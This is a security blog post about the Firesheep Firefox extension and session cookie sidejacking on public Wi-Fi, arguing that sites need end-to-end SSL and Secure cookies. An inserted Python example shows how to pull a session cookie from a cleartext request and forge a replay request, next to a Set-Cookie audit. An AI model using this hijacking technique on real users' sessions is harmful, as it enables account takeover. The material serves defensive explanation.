Firesheep wake-up call

Bruce Morton

Much has been written this past week about Firesheep. The bottom line: website operators must properly deploy SSL end-to-end security.

Firesheep is a Firefox extension written by Eric Butler and was presented by Butler and security consultant Ian Gallagher this past weekend at the ToorCon hacker conference in San Diego. Firesheep takes advantage of a long-known weakness: many websites protect the login page with SSL but then issue a session cookie without the Secure flag and serve the rest of the session over plain HTTP, so the cookie travels across the network in cleartext. When connected to a public Wi-Fi hotspot, the program passively captures the non-secure session cookies of other users on the same network; no decryption is needed because nothing was encrypted. When an unsuspecting user logs into an insecure website known to Firesheep, their name and photo are displayed in the Firesheep sidebar. The Firesheep user can then click on the other user and is instantly logged in as them, with no password required, because the server cannot distinguish a replayed cookie from the victim's own request.

Impacted websites include Amazon, Basecamp, bit.ly, Cisco, CNET, Dropbox, Enom, Evernote, Facebook, Flickr, Github, Google, HackerNews, Harvest, Windows Live, NY Times, Pivotal Tracker, Slicehost, tumblr, Twitter, WordPress, Yahoo, and Yelp. A plugin system allows a Firesheep user to add their own sites.

There are many suggested solutions to fight Firesheep. These solutions include:

  • don’t use public Wi-Fi
  • only use secure Wi-Fi
  • use a VPN service
  • force SSL by using a plug-in such as HTTPS-Everywhere or ForceTLS
  • use an anonymizer such as Tor

These are partial or, in some cases, impractical solutions that may or may not work. Worst of all, they push the problem onto the security-challenged end user, who must perform an action or make a trust decision; a website that relies on its users to protect themselves has not fixed anything.

The point of Firesheep is to put all website operators on notice that they need to wake up and properly secure their websites with full end-to-end encryption using SSL: every page of an authenticated session served over HTTPS, not just the login form. This practice includes the use of secure cookies, meaning session cookies set with the Secure attribute so the browser will never send them over plain HTTP. One without the other is not enough: a Secure cookie on a site that still serves pages over HTTP simply logs the user out on those pages, and an HTTPS site that issues a cookie without the Secure attribute will still leak it the moment the browser follows one HTTP link to the same domain.
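To make the mechanism and the fix concrete, here is an added worked example in Python. It is not code from this post, from Firesheep, or from Entrust. It shows both sides of the problem described above: the attacker's side, pulling a session cookie out of a cleartext HTTP request as a sniffer on an open hotspot would see it and replaying it, and the operator's side, auditing Set-Cookie headers for the Secure (and HttpOnly) attributes. The host name, the cookie name "sid" and the cookie values are constructed for illustration; real sites use their own session cookie names.

```python
# Added example, not code from the original post, Firesheep or Entrust.
# Both sides of the Firesheep problem in working Python:
#   1. attacker: read a session cookie off a cleartext HTTP request and
#      build the replay request that logs the attacker in as the victim;
#   2. operator: audit Set-Cookie headers for the Secure/HttpOnly attributes.
# Host, cookie names and values below are constructed for illustration.

# Constructed sample of what a passive sniffer sees when a browser that has
# already logged in fetches a non-SSL page and sends its session cookie.
CLEARTEXT_REQUEST = (
    b"GET /home HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Cookie: sid=2a7f9c1e; lang=en\r\n"
    b"\r\n"
)

# Session cookie names are site-specific; "sid" is assumed for this example.
SESSION_COOKIE_NAMES = ("sid",)


def extract_cookies(raw_request: bytes) -> dict:
    """Return the cookie name/value pairs carried by a cleartext HTTP request.

    This is all a sidejacking tool needs: no decryption, just reading the
    Cookie header off the wire, because the site sent it over plain HTTP."""
    head, _, _ = raw_request.partition(b"\r\n\r\n")
    cookies = {}
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"cookie":
            for pair in value.decode("latin-1").split(";"):
                key, _, val = pair.strip().partition("=")
                if key:
                    cookies[key] = val
    return cookies


def forge_request(host: str, path: str, cookies: dict) -> bytes:
    """Build the request the hijacker sends: same cookie, different client.

    The server cannot tell this apart from the victim's own request, which is
    why the attacker is logged in instantly without ever seeing a password."""
    cookie_header = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: {cookie_header}\r\n"
        "\r\n"
    ).encode("latin-1")


def parse_set_cookie(header: str):
    """Split a Set-Cookie header value into (cookie name, {attribute: value})."""
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        # Attribute names are case-insensitive; flags without a value map to True.
        attrs[key.strip().lower()] = val.strip() if val else True
    return name, attrs


def audit_set_cookie(header: str, session_names=SESSION_COOKIE_NAMES) -> list:
    """Return a list of findings for one Set-Cookie header; empty means OK."""
    name, attrs = parse_set_cookie(header)
    findings = []
    if name not in session_names:
        return findings                                  # not a session cookie
    if "secure" not in attrs:
        findings.append(f"{name}: no Secure attribute, browser will send it over plain HTTP")
    if "httponly" not in attrs:
        findings.append(f"{name}: no HttpOnly attribute, readable by scripts on the page")
    return findings


# Constructed examples of the weak header (what an affected site sends)
# and the hardened one (what an end-to-end SSL deployment should send).
WEAK_SET_COOKIE = "sid=2a7f9c1e; Path=/; Domain=.example.com"
HARDENED_SET_COOKIE = "sid=2a7f9c1e; Path=/; Domain=.example.com; Secure; HttpOnly"

if __name__ == "__main__":
    stolen = extract_cookies(CLEARTEXT_REQUEST)
    print("sniffed cookies:", stolen)
    print(forge_request("www.example.com", "/account", stolen).decode())
    for label, header in (("weak", WEAK_SET_COOKIE), ("hardened", HARDENED_SET_COOKIE)):
        print(label, audit_set_cookie(header) or ["OK"])
```

The audit only looks at the cookie attributes; it cannot tell you whether every page of the site is actually served over HTTPS, which is the other half of the fix. Run it against the Set-Cookie headers returned by the login response, and separately confirm that no authenticated page on the domain is still reachable over plain HTTP. HttpOnly is outside what Firesheep exploits, but a session cookie that lacks it is exposed to any script injected into the page, so it belongs in the same review.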

For other best practices on SSL deployment, see SSL Deployment Mistakes.

Bruce Morton
Director, Certificate Technology & Standards

Bruce Morton has worked in the public key infrastructure and digital certificate industry for more than 15 years and has focused on SSL and other publicly trusted certificates since 2005. He has been an active member of the CA/Browser Forum that released guidelines for extended validation (EV) certificates and Baseline Requirements for SSL certificates. Bruce oversees the governance and compliance of Entrust’s publicly trusted PKI.
